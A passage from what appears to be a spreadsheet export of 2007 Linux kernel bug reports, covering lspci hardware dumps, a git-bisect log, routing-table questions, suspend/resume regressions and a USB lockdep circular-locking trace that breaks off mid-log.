PME- Capabilities: [68] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [78] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;4us ExtTag- AttnBtn- AttnInd- PwrInd- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr+ FatalErr- UnsuppReq+ AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 128 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Kernel modules: nvidiafb 02:00.0 Ethernet controller [0200]: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller [11ab:4362] (rev 15) Subsystem: Toshiba America Info Systems Marvell 88E8053 Gigabit Ethernet Controller (Toshiba) [1179:0001] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 220 Region 0: Memory at cdffc000 (64-bit, non-prefetchable) [size=16K] Region 2: I/O ports at ce00 [size=256] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data &lt;?&gt; Capabilities: [5c] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0100c Data: 4132 Capabilities: [e0] Express (v1) Legacy Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- AttnBtn- AttnInd- PwrInd- RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd- ExtTag- PhantFunc- AuxPwr+ NoSnoop- MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr+ UncorrErr+ FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s, Latency L0 &lt;256ns, L1 unlimited ClockPM- Suprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 128 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Kernel driver in use: sky2 Kernel modules: sky2 05:05.0 Network controller [0280]: Intel Corporation PRO/Wireless 2200BG Network Connection [8086:4220] (rev 05) Subsystem: Intel Corporation Unknown device [8086:2741] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (750ns min, 6000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 22 Region 0: Memory at cdcff000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Kernel driver in use: ipw2200 Kernel modules: ipw2200 05:0b.0 CardBus bridge [0607]: Texas Instruments PCIxx21/x515 Cardbus Controller [104c:8031] Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 168, Cache Line Size: 128 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at cdc04000 (32-bit, non-prefetchable) [size=4K] Bus: primary=05, secondary=06, subordinate=06, sec-latency=176 Memory window 0: 8c000000-8ffff000 (prefetchable) Memory window 1: 90000000-93fff000 I/O window 0: 00001000-000010ff I/O window 1: 00001400-000014ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 Kernel driver in use: yenta_cardbus 05:0b.2 FireWire (IEEE 1394) [0c00]: Texas Instruments OHCI Compliant IEEE 1394 Host Controller [104c:8032] (prog-if 10 [OHCI]) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (500ns min, 1000ns max), Cache Line Size: 32 bytes Interrupt: pin C routed to IRQ 23 Region 0: Memory at cdc05000 (32-bit, non-prefetchable) [size=2K] Region 1: Memory at cdc00000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ Kernel driver in use: firewire_ohci Kernel modules: firewire-ohci 05:0b.4 Generic system peripheral [0805]: Texas Instruments PCI6411/6421/6611/6621/7411/7421/7611/7621 Secure Digital Controller [104c:8034] (prog-if 01) Subsystem: Toshiba America Info Systems Unknown device [1179:0001] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (1750ns min, 1000ns max), Cache Line Size: 32 bytes Interrupt: pin D routed to IRQ 19 Region 0: Memory at cdc05800 (32-bit, non-prefetchable) [size=256] Region 1: Memory at cdc05900 (32-bit, non-prefetchable) [size=256] Region 2: Memory at cdc05a00 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: sdhci Kernel modules: sdhci [root@helios ~]#</t>
  </si>
  <si>
    <t>routing table bug or feature adding/replacing/deleting routes</t>
  </si>
  <si>
    <t>2007-12-03 11:23 UTC</t>
  </si>
  <si>
    <t>Alexander Zubkov</t>
  </si>
  <si>
    <t>2008-09-24 06:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Ubuntu (kernel 2.6.22-14), Gentoo (kernel 2.6.23-gentoo-r3) Hardware Environment: x86 Software Environment: Steps to reproduce: (eth0 is 172.16.32.0/22): $ ip route add 172.17.0.1 via 172.16.32.1 $ ip route append 172.17.0.1 via 172.16.35.1 $ ip ro ... 172.17.0.1 via 172.16.32.1 dev eth0 172.17.0.1 via 172.16.35.1 dev eth0 ... $ ip ro replace 172.17.0.1 via 172.16.35.1 $ ip ro ... 172.17.0.1 via 172.16.35.1 dev eth0 172.17.0.1 via 172.16.35.1 dev eth0 ... $ ip ro del 172.17.0.1 $ ip ro ... 172.17.0.1 via 172.16.35.1 dev eth0 ... Problem Description: Is it OK: - only 1 route is deleted? - only 1 route is replaced? - replacing route results in dublicate routing table entry? Is this a bug or feature?</t>
  </si>
  <si>
    <t>Battery shows up twice in kpowersave</t>
  </si>
  <si>
    <t>d7380965752505951668e85de59c128d1d6fd21f</t>
  </si>
  <si>
    <t>2007-12-03 12:06 UTC</t>
  </si>
  <si>
    <t>2008-01-16 10:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: aa650bbdcb94bde4292eabc44490970825c98669 Distribution: openSuSE 10.3 Hardware Environment: Toshiba Satellite A110-178 Software Environment: KDE 3.5.7 Problem Description: Battery shows up twice in kpowersave. This leads to bad behaviour if the battery is empty as the laptop is not suspended automatically. Bisect log: # good: [aa650bbdcb94bde4292eabc44490970825c98669] ACPI: Battery: Misc clean-ups, no functional changes git-bisect good aa650bbdcb94bde4292eabc44490970825c98669 # bad: [00a2b433557f10736e8a02de619b3e9052556c12] Pull acpica into test branch git-bisect bad 00a2b433557f10736e8a02de619b3e9052556c12 # good: [4ecbca8554d0f643351ee07d3284138a5e85ba81] Remove unnecessary cast in prefetch() git-bisect good 4ecbca8554d0f643351ee07d3284138a5e85ba81 # good: [6cffd46651b881a11791a7ef4d99f2f20853fcd9] ACPI: clean up acpi_enter_sleep_state_prep git-bisect good 6cffd46651b881a11791a7ef4d99f2f20853fcd9 # good: [73a855f70d9b3571fa878727cbc568d9774c6dce] Pull video into release branch git-bisect good 73a855f70d9b3571fa878727cbc568d9774c6dce # bad: [d5b4a3d0efa36de31b86d5677dad6c36cb8735d7] ACPI: AC: Add sysfs interface git-bisect bad d5b4a3d0efa36de31b86d5677dad6c36cb8735d7 # bad: [91087dfa51a29b3c190e99339c4c32eb13646c51] ACPI: SBS: Split host controller (ACPI0001) from SBS driver (ACPI0002) git-bisect bad 91087dfa51a29b3c190e99339c4c32eb13646c51 # bad: [3e58ea0d31659b22ba5753f7abf3d7db346eab81] ACPI: Battery: add sysfs alarm git-bisect bad 3e58ea0d31659b22ba5753f7abf3d7db346eab81 # bad: [d7380965752505951668e85de59c128d1d6fd21f] ACPI: Battery: Add sysfs support git-bisect bad d7380965752505951668e85de59c128d1d6fd21f</t>
  </si>
  <si>
    <t>[2.6.24 BUG] 100% iowait on host while UML is running</t>
  </si>
  <si>
    <t>2007-12-03 13:25 UTC</t>
  </si>
  <si>
    <t>2007-12-07 17:51 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.24 BUG] 100% iowait on host while UML is running Submitter : Miklos Szeredi &lt;miklos@szeredi.hu&gt; References : http://lkml.org/lkml/2007/12/3/119 Handled-By : Jeff Moyer &lt;jmoyer@redhat.com&gt; Patch : http://lkml.org/lkml/2007/12/3/192</t>
  </si>
  <si>
    <t>kobject -&gt;k_name memory leak</t>
  </si>
  <si>
    <t>commit ce2c9cb0259acd2aed184499ebe41ab00da13b25</t>
  </si>
  <si>
    <t>2007-12-03 13:42 UTC</t>
  </si>
  <si>
    <t>2008-01-07 07:56 UTC</t>
  </si>
  <si>
    <t>Subject : kobject -&gt;k_name memory leak Submitter : Alexey Dobriyan &lt;adobriyan@sw.ru&gt; References : http://lkml.org/lkml/2007/12/3/20 Handled-By : Greg KH &lt;gregkh@suse.de&gt; Caused by: commit ce2c9cb0259acd2aed184499ebe41ab00da13b25 Author: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; Date: Wed Sep 12 15:06:57 2007 -0700 kobject: remove the static array for the name http://git.kernel.org/gitweb.cgi?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ce2c9cb0259acd2aed184499ebe41ab00da13b25</t>
  </si>
  <si>
    <t>SLOB, tipc_init(), WARNING: at arch/x86/mm/highmem_32.c:52 kmap_atomic_prot()</t>
  </si>
  <si>
    <t>2.6.24-rc3+</t>
  </si>
  <si>
    <t>2007-12-03 13:57 UTC</t>
  </si>
  <si>
    <t>2007-12-10 12:29 UTC</t>
  </si>
  <si>
    <t>Subject : tipc_init(), WARNING: at arch/x86/mm/highmem_32.c:52 kmap_atomic_prot() Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; References : http://lkml.org/lkml/2007/11/29/157 Handled-By : Matt Mackall &lt;mpm@selenic.com&gt; Patch : http://lkml.org/lkml/2007/11/29/387</t>
  </si>
  <si>
    <t>Regression - 2.6.24-rc3 - umem nvram card driver oops</t>
  </si>
  <si>
    <t>2007-12-03 14:05 UTC</t>
  </si>
  <si>
    <t>2007-12-11 16:15 UTC</t>
  </si>
  <si>
    <t>Subject : Regression - 2.6.24-rc3 - umem nvram card driver oops Submitter : David Chinner &lt;dgc@sgi.com&gt; References : http://lkml.org/lkml/2007/12/3/216</t>
  </si>
  <si>
    <t>Unstable S3 resume on SMP systems</t>
  </si>
  <si>
    <t>2.6.23.9</t>
  </si>
  <si>
    <t>2007-12-04 02:05 UTC</t>
  </si>
  <si>
    <t>warpme</t>
  </si>
  <si>
    <t>2009-04-02 04:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: minimyth Hardware Environment: ASUS M2NPV-VM &amp; Abit An-M2HD, both on AMD X2 4400 Software Environment: all minimyth versions based on 2.6.23 (older kernels not tested) Problem Description: I'm setting up 2 appliances based on AMD x2 4400 CPU and Nvidia Mobos: ASUS M2NPV-VM (6150 based) and Abit AN-M2HD (7050 based). Kernel is 2.6.23.9. NV are 169.04 Issue is stability of S3 resume: -on ASUS it hangs every 3-10 try and it not depends on maxcpus setting. -on Abit also it hangs every 3-10 try, but with maxcpus=1 is stable. Stability It is not depending on enabled HW on mobos - even with all HW disabled in BIOS S3, resume is still unstable. Observing resume process I didn't see any errors in syslog. There are warnings about cooling device (unable to turn on). Also when resume hangs it hangs always with still lightning CapsLock keyb led (keyb is not reacting on CapsLock pressing) -&gt; it leads me that it isn't video issue. As Abit with maxcpus=1 and ASUS with UP kernel are working OK (I'm not able to reproduce this instability) - it hints me that resume issue is related to possible bugs in non-booting processor initialization phase or races/locking in SMP enabled phase of resume. Steps to reproduce: setup MythTV server, download minimyth (http://linpvr.org/minimyth/download/stable/latest/), boot it from TFTP and start series of many suspend/resume. In my case average 4-6 resume hangs.</t>
  </si>
  <si>
    <t>binfmt_misc file system is empty</t>
  </si>
  <si>
    <t>2.6.24-rc4</t>
  </si>
  <si>
    <t>2007-12-05 02:35 UTC</t>
  </si>
  <si>
    <t>2007-12-11 16:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc3 (probably) Distribution: Debian Hardware Environment: Two laptops, i386 and x86_64 Software Environment: Debian testing/unstable Problem Description: The /proc/sys/fs/binfmt_misc/ directory is empty. The "register" and "status" files seem to have disappeared. ~$ ls /proc/sys/fs/binfmt_misc/ ~$ mount | grep binfmt_misc binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev) ~$</t>
  </si>
  <si>
    <t>[build bug] undefined reference to `dib3000mc_get_tuner_i2c_master'</t>
  </si>
  <si>
    <t>2007-12-05 16:15 UTC</t>
  </si>
  <si>
    <t>2008-05-29 06:07 UTC</t>
  </si>
  <si>
    <t>Subject : [build bug] undefined reference to `dib3000mc_get_tuner_i2c_master' Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; References : http://lkml.org/lkml/2007/12/4/38 Handled-By : Jiri Kosina &lt;jikos@jikos.cz&gt; Patch : http://lkml.org/lkml/2007/12/4/61</t>
  </si>
  <si>
    <t>2.6.24-rc4 hwmon it87 probe fails</t>
  </si>
  <si>
    <t>2007-12-06 17:10 UTC</t>
  </si>
  <si>
    <t>2008-02-25 00:17 UTC</t>
  </si>
  <si>
    <t>Mark M. Hoffman</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc4 hwmon it87 probe fails Submitter : Mike Houston &lt;mikeserv@bmts.com&gt; References : http://lkml.org/lkml/2007/12/4/466</t>
  </si>
  <si>
    <t>Major regression on hackbench with SLUB</t>
  </si>
  <si>
    <t>commit f194d132e4971111f85c18c96067acffb13cee6d</t>
  </si>
  <si>
    <t>2007-12-07 11:13 UTC</t>
  </si>
  <si>
    <t>2008-02-12 02:27 UTC</t>
  </si>
  <si>
    <t>Subject : Major regression on hackbench with SLUB Submitter : Steven Rostedt &lt;rostedt@goodmis.org&gt; References : http://lkml.org/lkml/2007/12/7/181 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>2.6.24-rc3-git4 NFS crossmnt regression</t>
  </si>
  <si>
    <t>2.6.24-rc3-git4</t>
  </si>
  <si>
    <t>2007-12-07 11:33 UTC</t>
  </si>
  <si>
    <t>2007-12-17 15:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc3-git4 NFS crossmnt regression Submitter : Shane &lt;gnome42@gmail.com&gt; References : http://lkml.org/lkml/2007/12/6/410 Handled-By : "Trond Myklebust" &lt;trond.myklebust@fys.uio.no&gt; Patch : http://lkml.org/lkml/2007/12/7/206</t>
  </si>
  <si>
    <t>ACPI: Error installing bay notify handler - Acer PentiumM</t>
  </si>
  <si>
    <t>2007-12-07 20:24 UTC</t>
  </si>
  <si>
    <t>2008-06-17 20:00 UTC</t>
  </si>
  <si>
    <t>When booting on my laptop (with 2.6.24 kernel from ubuntu hardy) I get: ACPI: \_SB_.PCI0.IDE0.SECN.BAY1: found ejectable bay ACPI: \_SB_.PCI0.IDE0.SECN.BAY1: Adding notify handler ACPI: Error installing bay notify handler ACPI: Bay [\_SB_.PCI0.IDE0.SECN.BAY1] Added</t>
  </si>
  <si>
    <t>s2ram hang - 2.6.22 regression - Asus A8N-SLI, Abit KN9 (Nvidia NForce4)</t>
  </si>
  <si>
    <t>2.6.22+</t>
  </si>
  <si>
    <t>2007-12-08 04:54 UTC</t>
  </si>
  <si>
    <t>Arthur Erhardt</t>
  </si>
  <si>
    <t>2011-08-06 02:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc4 Distribution: OpenSuSE 10.2, 10.3 Hardware Environment: Asus A8N SLI-Premium, Opteron 175 Software Environment: OpenSuSE 10.[23], x86_64, console or Xorg Problem Description:system freeze instead of suspend to ram Steps to reproduce: run s2ram -f -a 1 (or any other recommended set of args) System freezes both from console and Xorg. In 2.6.21 s2ram works fine, even with nvidia binary driver installed.</t>
  </si>
  <si>
    <t>STD regression rc1 -&gt; rc234, suspend fails completely</t>
  </si>
  <si>
    <t>2007-12-09 05:39 UTC</t>
  </si>
  <si>
    <t>2007-12-22 04:58 UTC</t>
  </si>
  <si>
    <t>Subject : STD regression rc1 -&gt; rc234, suspend fails completely Submitter : Andreas Mohr &lt;andi@lisas.de&gt; References : http://lkml.org/lkml/2007/12/8/34 Handled-By : Robert Hancock &lt;hancockr@shaw.ca&gt; Tejun Heo &lt;htejun@gmail.com&gt;</t>
  </si>
  <si>
    <t>circular locking dependency when unplugging USB keyboard</t>
  </si>
  <si>
    <t>2007-12-10 05:30 UTC</t>
  </si>
  <si>
    <t>2007-12-17 15:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Debian Hardware Environment: i386 laptop (LG LE50 Express) Software Environment: Debian testing/unstable, X.org, KDE Problem Description: I got the following messages when unplugging a USB-connected wireless keyboard. Dec 10 14:21:41 better kernel: usb 1-1: USB disconnect, address 3 Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: ======================================================= Dec 10 14:21:41 better kernel: [ INFO: possible circular locking dependency detected ] Dec 10 14:21:41 better kernel: 2.6.24-rc4-lg #1 Dec 10 14:21:41 better kernel: ------------------------------------------------------- Dec 10 14:21:41 better kernel: khubd/680 is trying to acquire lock: Dec 10 14:21:41 better kernel: (&amp;dev-&gt;pm_mutex){--..}, at: [&lt;f8d0984b&gt;] usb_autopm_do_device+0x2b/0x110 [usbcore] Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: but task is already holding lock: Dec 10 14:21:41 better kernel: (&amp;dev-&gt;pm_mutex/1){--..}, at: [&lt;f8d034b1&gt;] usb_disconnect+0xf1/0x140 [usbcore] Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: which lock already depends on the new lock. Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: the existing dependency chain (in reverse order) is: Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #6 (&amp;dev-&gt;pm_mutex/1){--..}: Dec 10 14:21:41 better kernel: [&lt;c0240980&gt;] __lock_acquire+0xbc0/0x1080 Dec 10 14:21:41 better kernel: [&lt;f8d09eca&gt;] usb_autopm_do_interface+0x3a/0xd0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d09eca&gt;] usb_autopm_do_interface+0x3a/0xd0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;f8d09eca&gt;] usb_autopm_do_interface+0x3a/0xd0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c043fcdf&gt;] mutex_lock_nested+0x7f/0x2f0 Dec 10 14:21:41 better kernel: [&lt;f8d09eca&gt;] usb_autopm_do_interface+0x3a/0xd0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c03b5136&gt;] input_open_device+0x26/0xa0 Dec 10 14:21:41 better kernel: [&lt;f8d09eca&gt;] usb_autopm_do_interface+0x3a/0xd0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d63a5b&gt;] usbhid_open+0x3b/0x50 [usbhid] Dec 10 14:21:41 better kernel: [&lt;f8d5eaaa&gt;] hidinput_open+0xa/0x10 [hid] Dec 10 14:21:41 better kernel: [&lt;c03b518a&gt;] input_open_device+0x7a/0xa0 Dec 10 14:21:41 better kernel: [&lt;c037c56a&gt;] kbd_connect+0x6a/0x90 Dec 10 14:21:41 better kernel: [&lt;c03b4d27&gt;] input_attach_handler+0x57/0x90 Dec 10 14:21:41 better kernel: [&lt;c03b6f29&gt;] input_register_device+0x1a9/0x210 Dec 10 14:21:41 better kernel: [&lt;f8d5b992&gt;] hidinput_connect+0x382/0x32d0 [hid] Dec 10 14:21:41 better kernel: [&lt;f8d64573&gt;] hid_probe+0x933/0xce0 [usbhid] Dec 10 14:21:41 better kernel: [&lt;c023f86f&gt;] trace_hardirqs_on+0xaf/0x160 Dec 10 14:21:41 better kernel: [&lt;c043fb75&gt;] __mutex_unlock_slowpath+0xb5/0x190 Dec 10 14:21:41 better kernel: [&lt;c023f86f&gt;] trace_hardirqs_on+0xaf/0x160 Dec 10 14:21:41 better kernel: [&lt;f8d098a4&gt;] usb_autopm_do_device+0x84/0x110 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d09407&gt;] usb_match_one_id+0x27/0xb0 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8d0a6b9&gt;] usb_probe_interface+0xb9/0x140 [usbcore] Dec 10 14:21:41 better kernel: [&lt;c0394c27&gt;] driver_probe_device+0x87/0x190 Dec 10 14:21:41 better kernel: [&lt;c0394eb4&gt;] __driver_attach+0xb4/0xc0 Dec 10 14:21:41 better kernel: [&lt;c0393fdc&gt;] bus_for_each_dev+0x3c/0x60 Dec 10 14:21:41 better kernel: [&lt;c0394a96&gt;] driver_attach+0x16/0x20 Dec 10 14:21:41 better kernel: [&lt;c0394e00&gt;] __driver_attach+0x0/0xc0 Dec 10 14:21:41 better kernel: [&lt;c039437b&gt;] bus_add_driver+0x8b/0x1f0 Dec 10 14:21:41 better kernel: [&lt;f8d0a1c9&gt;] usb_register_driver+0x99/0x120 [usbcore] Dec 10 14:21:41 better kernel: [&lt;f8877034&gt;] 0xf8877034 Dec 10 14:21:41 better kernel: [&lt;c0237897&gt;] blocking_notifier_call_chain+0x17/0x20 Dec 10 14:21:41 better kernel: [&lt;c0246dcd&gt;] sys_init_module+0x12d/0x17d0 Dec 10 14:21:41 better kernel: [&lt;c02043a6&gt;] syscall_call+0x7/0xb Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #5 (&amp;dev-&gt;mutex){--..}: Dec 10 14:21:41 better kernel: [&lt;c0240980&gt;] __lock_acquire+0xbc0/0x1080 Dec 10 14:21:41 better kernel: [&lt;c03b509a&gt;] input_register_handle+0x2a/0xa0 Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;c03b509a&gt;] input_register_handle+0x2a/0xa0 Dec 10 14:21:41 better kernel: [&lt;c043f7cb&gt;] mutex_lock_interruptible_nested+0x8b/0x380 Dec 10 14:21:41 better kernel: [&lt;c03b509a&gt;] input_register_handle+0x2a/0xa0 Dec 10 14:21:41 better kernel: [&lt;c023f6d8&gt;] mark_held_locks+0x38/0x70 Dec 10 14:21:41 better kernel: [&lt;c03b509a&gt;] input_register_handle+0x2a/0xa0 Dec 10 14:21:41 better kernel: [&lt;c03b509a&gt;] input_register_handle+0x2a/0xa0 Dec 10 14:21:41 better kernel: [&lt;c037c54f&gt;] kbd_connect+0x4f/0x90 Dec 10 14:21:41 better kernel: [&lt;c03b4d27&gt;] input_attach_handler+0x57/0x90 Dec 10 14:21:41 better kernel: [&lt;c03b6f29&gt;] input_register_device+0x1a9/0x210 Dec 10 14:21:41 better kernel: [&lt;c03b8cc6&gt;] atkbd_connect+0x206/0x230 Dec 10 14:21:41 better kernel: [&lt;c03b1c68&gt;] serio_connect_driver+0x28/0x50 Dec 10 14:21:41 better kernel: [&lt;c0394c27&gt;] driver_probe_device+0x87/0x190 Dec 10 14:21:41 better kernel: [&lt;c0394eb4&gt;] __driver_attach+0xb4/0xc0 Dec 10 14:21:41 better kernel: [&lt;c0393fdc&gt;] bus_for_each_dev+0x3c/0x60 Dec 10 14:21:41 better kernel: [&lt;c0394a96&gt;] driver_attach+0x16/0x20 Dec 10 14:21:41 better kernel: [&lt;c0394e00&gt;] __driver_attach+0x0/0xc0 Dec 10 14:21:41 better kernel: [&lt;c03b29a6&gt;] serio_thread+0x256/0x360 Dec 10 14:21:41 better kernel: [&lt;c021b280&gt;] finish_task_switch+0x0/0xb0 Dec 10 14:21:41 better kernel: [&lt;c0233070&gt;] autoremove_wake_function+0x0/0x40 Dec 10 14:21:41 better kernel: [&lt;c03b2750&gt;] serio_thread+0x0/0x360 Dec 10 14:21:41 better kernel: [&lt;c0232dd2&gt;] kthread+0x42/0x70 Dec 10 14:21:41 better kernel: [&lt;c0232d90&gt;] kthread+0x0/0x70 Dec 10 14:21:41 better kernel: [&lt;c0204f5b&gt;] kernel_thread_helper+0x7/0x1c Dec 10 14:21:41 better kernel: [&lt;ffffffff&gt;] 0xffffffff Dec 10 14:21:41 better kernel: Dec 10 14:21:41 better kernel: -&gt; #4 (input_mutex){--..}: Dec 10 14:21:41 better kernel: [&lt;c0240980&gt;] __lock_acquire+0xbc0/0x1080 Dec 10 14:21:41 better kernel: [&lt;c03b6ed4&gt;] input_register_device+0x154/0x210 Dec 10 14:21:41 better kernel: [&lt;c021b280&gt;] finish_task_switch+0x0/0xb0 Dec 10 14:21:41 better kernel: [&lt;c0240e9f&gt;] lock_acquire+0x5f/0x80 Dec 10 14:21:41 better kernel: [&lt;c03b6ed4&gt;] input_register_device+0x154/0x210 Dec 10 14:21:41 better kernel: [&lt;c043f7cb&gt;] mutex_lock_interruptible_nested+0x8b/0x380 Dec 10 14:21:41 better kernel: [&lt;c03b6ed4&gt;] input_register_device+0x154/0x210 Dec 10 14:21:41 better last message repeated 2 times Dec 10 14:21:41 better kernel: [&lt;f8e6dda8&gt;] rt2x00rfkill_register+0x78/0xd0 [rt2x00lib] Dec 10 14:21:41 better kernel: [&lt;f8e6bb9f&gt;] rt2x00lib_initialize+0x13f/0x160 [rt2x00lib] Dec 10 14:21:41 better kernel: [&lt;f8e6c68a&gt;] rt2x00mac_start+0x3a/0x70 [rt2x00lib] Dec 10 14:21:41 better kernel: [&lt;f8ef0b77&gt;] ieee80211_open+0x1e7/0x4a0 [mac80211] Dec 10 14:21:41 better kernel: [&lt;c023f6d8&gt;] mark_held_locks+0x38/0x70 Dec 10 14:21:41 better kernel: [&lt;c0224986&gt;] local_bh_enable_ip+0x86/0x110 Dec 10 14:21:41 better kernel: [&lt;c03cde19&gt;] dev_set_rx_mode+0x19/0x50 Dec 10 14:21:41 better kernel: [&lt;c03d04dc&gt;] dev_open+0x4c/0x80 Dec 10 14:21:41 better kernel: [&lt;c03cef52&gt;] dev_change_flags+0x82/0x1b0 Dec 10 14:21:41 better kernel: [&lt;c03cd3e2&gt;] __dev_get_by_name+0x72/0x90 Dec 10 14:21:41 better kernel: [&lt;c04176f0&gt;] devinet_ioctl+0x500/0x6a0 Dec 10 14:21:41 better kernel: [&lt;c03d0330&gt;] dev_ioctl+0x480/0x560 Dec 10 14:21:41 better kernel: [&lt;c03c1942&gt;] sock_ioctl+0xd2/0x230 Dec 10 14:21:41 better kernel: [&lt;c03c1870&gt;] sock_ioctl+0x0/0x230 Dec 10 14:21:41 better kernel: [&lt;c028ac3b&gt;] do_ioctl+0x2b/0x90 Dec 10 14:21:41 better kernel: [&lt;c028aea1&gt;] vfs_ioctl+0x201/0x2d0 Dec 10 14:21:41 better kernel: [&lt;c023f86f&gt;] trace_hardirqs_on+0xaf/0x160 Dec 10 14:21:41 better kernel: [&lt;c028afc6&gt;] sys_ioctl+0x56/0x70 Dec 10 14:21:41 better 